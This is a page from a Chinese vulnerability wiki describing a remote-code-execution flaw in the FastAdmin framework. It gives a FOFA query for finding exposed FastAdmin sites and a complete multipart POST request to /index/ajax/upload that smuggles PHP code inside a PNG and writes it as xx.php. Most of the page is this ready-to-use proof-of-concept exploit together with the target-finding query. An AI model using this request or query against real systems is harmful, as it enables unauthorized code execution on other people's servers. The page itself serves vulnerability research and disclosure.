menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right FastAdmin 框架远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    FastAdmin 框架远程代码执行漏洞.md
    1.4 KB / 2021-05-21 09:14:38
        # FastAdmin 框架远程代码执行漏洞
    
    
    FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。FastAdmin框架存在有条件RCE漏洞,当攻击者具有一定用户权限的前提下,可以实现任意文件上传,导致RCE。
    
    FOFA:
    
    ```
    app="FASTADMIN-框架" || body="\"uploadurl\":\"ajax\/upload\"" || body="api.fastadmin.net" || body="\"fastadmin\":{\"usercenter\":true" || body="content=\"FastAdmin\"" || body="cdnurl\":\"\",\"version"|| icon_hash="-1036943727"
    ```
    
    详细分析可以见:https://mp.weixin.qq.com/s/otrH75ZjCHBQbRB7g5DdWg
    
    条件:
    
    * 普通用户
    * chunking = true (开启分片上传功能)
    
    上传头像处post:
    
    ```
    //传入xx.php
    POST /index/ajax/upload HTTP/1.1
    Host: target
    
    ------WebKitFormBoundarybw5c2a2bqlLLOMEU
    Content-Disposition: form-data; name="file"; filename="Xnip2021-04-02_11-05-27.png"
    Content-Type: application/octet-stream
    
    PNG
    ...
    <?php phpinfo();?>
    ------WebKitFormBoundarybw5c2a2bqlLLOMEU
    Content-Disposition: form-data; name="chunkid"
    
    xx.php
    
    ------WebKitFormBoundarybw5c2a2bqlLLOMEU
    Content-Disposition: form-data; name="chunkindex"
    
    0
    ------WebKitFormBoundarybw5c2a2bqlLLOMEU
    ```
    
    ![-w692](media/16215847478584/16215847933888.jpg)
    
    
    ref:
    
    * https://mp.weixin.qq.com/s/otrH75ZjCHBQbRB7g5DdWg
    * https://mp.weixin.qq.com/s/XP9t0TkObawMTSb41Z13gw
    * https://nosec.org/home/detail/4713.html
    * https://forum.ywhack.com/thread-115352-1-6.html
    
    links
    file_download